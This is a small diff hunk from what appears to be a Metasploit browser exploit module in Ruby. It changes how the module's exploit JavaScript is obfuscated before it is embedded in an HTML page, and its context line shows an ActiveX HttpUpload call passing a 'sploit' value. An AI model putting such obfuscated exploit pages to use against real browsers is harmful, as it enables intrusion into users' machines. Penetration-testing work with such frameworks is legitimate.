@@ -112,7 +112,7 @@ obj.HttpUpload(arg1, arg2, sploit);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Build the final HTML
     content = %Q|<html>
